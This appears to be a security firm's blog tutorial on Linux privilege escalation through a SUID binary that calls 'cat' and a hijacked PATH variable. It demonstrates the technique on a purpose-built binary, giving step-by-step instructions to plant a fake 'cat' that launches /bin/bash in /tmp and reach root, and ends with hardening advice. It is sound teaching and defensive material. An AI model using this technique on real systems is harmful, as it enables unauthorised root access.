What is Privilege Escalation?
Imagine you are a hacker. You hacked a Linux system but you are a low-privilege user. You cannot access critical files like /etc/shadow (password hashes) because of your privileges. What can you do in this situation? This is where privilege escalation attacks are involved.
In order to increase the attack surface and reach the desired target, the attacks made to access the user with higher privileges than the user with limited privileges in the system are called privilege escalation attacks. The user with the highest privileges on Linux systems is the root user.
In this blog post, we’ll show you Linux privilege escalation with PATH variable and SUID bit…. aka “How to Become the root user by using the PATH Environment Variable and SUID Bit”.
What is The SUID (Set Owner User ID) Bit?
SUID is a Linux permission flag that allows users to run executables as the owner of the executables. For example, if we have an executable that runs a cat command to /etc/shadow file. Normally non-root users can not read /etc/shadow. But if the executable has a SUID bit from the root user, then we can read the /etc/shadow file as a non-root user.
Binaries are Linux executables in the /bin folder. Linux has some binaries that have SUID bits. For example passwd. passwd is a command for changing the user password and has a SUID bit. When we type the command, we are executing it as a root user.
We can check file permissions and of course the SUID bits with the ls -l command. Also, we can find the SUID bits in all filesystems with the find / -perm -u=s -type f 2>/dev/null command.
The SUID bit is indicated by the letter “s”.
What is The PATH Environment Variable?
Before learning the PATH variable, we should talk about environment variables. In short, environment variables are dynamic values that can affect the processes and behaviors of the operating system.
Everything is a file in Linux. So the Linux commands are also files. For example, cat is a binary file that is located in the /usr/bin directory. We can check where the comm`and that we typed is located with which command. For example usage: “which cat”
The PATH variable is an environment variable that specifies the locations where executable commands are located. For example, when we run the cat command, how does the OS know where the cat command is located? So firstly, the OS looks at the PATH variable and learns where the cat executable is located.
We can show all environment variables with the env command. If we only want to see the PATH environment variable, we can use the echo $PATH command.
Put Them Together
Now imagine again you are a hacker. You hacked a Linux system and now you are a low-privilege user. When you search the system with find / -perm -u=s -type f 2>/dev/null command, you found an executable with the SUID bit. You realized, the executable is performing the reading process to /etc/shadow file with cat command. You as an experienced hacker know the cat command location is stored in the PATH environment variable. What if you can change the PATH environment variable for a newly created cat executable location?
Demonstration
We created an executable named prplbx with an SUID bit that performs the read process to /etc/shadow file. Now we will become a root user from low privilege user “lowpriv” with methods that we just learned.
First of all, we should search for files that have an SUID bit.
Now, let’s run the program to see what it is gonna do. It is reading the /etc/shadow file.
This means the prplbx executable is using the cat command. So we can manipulate the PATH variable and cat command. This manipulation will lead us to become root user. Now, we should navigate to the /tmp folder. Why? Because the /tmp folder is writable by every user. We will create our new cat command in this folder. Let’s create.
- Navigate to the /tmp folder.
- Write the /bin/bash command to a new file named cat.
- Give this newly created cat file executable permission with the chmod +x command.
- To check the newly created cat file permissions, type ls -l and ensure the “x” flag.
- To check the newly created cat file content, type cat ./cat and ensure the content.
Our new cat file is ready but the OS is still using the /usr/bin/cat binary. So we should change the PATH variable for manipulating the OS to use our newly created /tmp/cat executable. We can change the PATH variable with the export command.
Now when we execute the prplbx binary, the binary will attempt to run the cat command with root user privileges. So the OS will look to the PATH variable for locating the cat command. It will locate the cat command in the /tmp folder because of our manipulation. Our cat command has a bash shell command in it. So it means the bash shell command will run with root privileges and we will become root. Let’s try.
We escalated our privileges from lowpriv user to root user successfully.
Recommendation
- Be very careful when making custom SUID executables.
- Before making a custom SUID executable, you should ensure there is no other way to do this task.
- You should not give SUID permissions to programs like cp, find, mv etc.
You can check the binaries which are dangerous to set a SUID bit in here.
We hope you found our blog post useful. Don’t forget to check out our Penetration Testing services to stay secure!
If you want to read more on this topic, feel free to check out the PurpleBox Blog Section.